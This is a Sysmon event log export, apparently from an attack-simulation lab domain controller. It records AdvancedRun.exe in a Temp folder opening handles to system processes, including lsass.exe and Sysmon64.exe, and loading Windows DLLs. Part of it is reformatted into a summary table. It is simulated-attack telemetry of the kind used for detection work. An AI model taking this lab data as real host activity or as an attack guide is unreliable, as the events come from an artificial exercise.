18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
Sysmon Event ID 10 (ProcessAccess) records, reconstructed one per line from the export, which runs the fields together and breaks records across lines. Every record in this run shares the same header and source-side fields, listed once here:
EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-mhaag-attack-range-139.attackrange.local | RuleName - | UtcTime 2022-01-21 18:41:37.741
SourceProcessGUID {834264DD-FE61-61EA-B605-000000002702} | SourceProcessId and SourceThreadId 3044972 (the two numbers are run together in the export; the boundary between them is not recoverable from the text) | SourceImage C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe | SourceUser ATTACKRANGE\Administrator
CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)
(the CallTrace is identical for every record except EventRecordID 4009355, where the frame AdvancedRun.exe+ab4b reads AdvancedRun.exe+ab6d)

Per-record fields: EventRecordID | TargetProcessGUID | TargetProcessId | TargetImage | GrantedAccess | TargetUser
(header on the preceding line) | {834264DD-DAF5-61EA-3700-000000002702} | 1932 | C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009380 | {834264DD-DAF5-61EA-3500-000000002702} | 1832 | C:\Windows\system32\dns.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009379 | {834264DD-DAF5-61EA-3400-000000002702} | 2460 | C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009378 | {834264DD-DAF5-61EA-3300-000000002702} | 2488 | C:\Windows\Sysmon64.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009377 | {834264DD-DAF5-61EA-3200-000000002702} | 1948 | C:\Windows\system32\svchost.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009376 | {834264DD-DAF5-61EA-3100-000000002702} | 660 | C:\Windows\System32\svchost.exe | 0x1410 | NT AUTHORITY\NETWORK SERVICE
4009375 | {834264DD-DAF5-61EA-3000-000000002702} | 668 | C:\Windows\system32\svchost.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009374 | {834264DD-DAF5-61EA-2F00-000000002702} | 2440 | C:\Windows\system32\svchost.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009373 | {834264DD-DAF4-61EA-2D00-000000002702} | 2988 | C:\Windows\System32\spoolsv.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009372 | {834264DD-DAF2-61EA-2C00-000000002702} | 2896 | C:\Windows\system32\conhost.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009371 | {834264DD-DAF2-61EA-2B00-000000002702} | 2888 | C:\Users\Public\splunkd.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009370 | {834264DD-DAF0-61EA-2900-000000002702} | 2760 | C:\Windows\System32\svchost.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009369 | {834264DD-DAE8-61EA-2000-000000002702} | 1516 | C:\Windows\system32\svchost.exe | 0x1410 | NT AUTHORITY\NETWORK SERVICE
4009368 | {834264DD-DAE7-61EA-1800-000000002702} | 1384 | C:\Windows\system32\svchost.exe | 0x1410 | NT AUTHORITY\LOCAL SERVICE
4009367 | {834264DD-DAE7-61EA-1700-000000002702} | 1300 | C:\Windows\System32\svchost.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009366 | {834264DD-DAE7-61EA-1600-000000002702} | 1264 | C:\Windows\system32\svchost.exe | 0x1410 | NT AUTHORITY\LOCAL SERVICE
4009365 | {834264DD-DAE7-61EA-1500-000000002702} | 1064 | C:\Windows\system32\svchost.exe | 0x1410 | NT AUTHORITY\NETWORK SERVICE
4009364 | {834264DD-DAE7-61EA-1400-000000002702} | 352 | C:\Windows\System32\svchost.exe | 0x1410 | NT AUTHORITY\LOCAL SERVICE
4009363 | {834264DD-DAE7-61EA-1300-000000002702} | 832 | C:\Windows\system32\svchost.exe | 0x1410 | NT AUTHORITY\LOCAL SERVICE
4009362 | {834264DD-DAE7-61EA-1200-000000002702} | 820 | C:\Windows\system32\dwm.exe | 0x1410 | Window Manager\DWM-1
4009361 | {834264DD-DAE7-61EA-1100-000000002702} | 488 | C:\Windows\System32\svchost.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009360 | {834264DD-DAE7-61EA-1000-000000002702} | 92 | C:\Windows\System32\svchost.exe | 0x1410 | NT AUTHORITY\NETWORK SERVICE
4009359 | {834264DD-DAE7-61EA-0F00-000000002702} | 364 | C:\Windows\system32\LogonUI.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009358 | {834264DD-DAE6-61EA-0E00-000000002702} | 932 | C:\Windows\system32\svchost.exe | 0x1410 | NT AUTHORITY\NETWORK SERVICE
4009357 | {834264DD-DAE6-61EA-0D00-000000002702} | 876 | C:\Windows\system32\svchost.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009356 | {834264DD-DAE4-61EA-0C00-000000002702} | 652 | C:\Windows\system32\lsass.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009355 | {834264DD-DAE4-61EA-0A00-000000002702} | 628 | C:\Windows\system32\services.exe | 0x1000 | NT AUTHORITY\SYSTEM
4009354 | {834264DD-DAE4-61EA-0900-000000002702} | 576 | C:\Windows\system32\winlogon.exe | 0x1410 | NT AUTHORITY\SYSTEM
4009353 | (header only: EventID 10, Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000, Channel Microsoft-Windows-Sysmon/Operational, Computer win-dc-mhaag-attack-range-139.attackrange.local, RuleName -, UtcTime 2022-01-21; the record body continues on the next line)
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009352Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009351Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009350Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004009349Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004009348Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009347Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.725{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004009346Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009345Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009344Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009343Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009342Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004009341Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009340Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009339Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009338Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009337Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009335Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 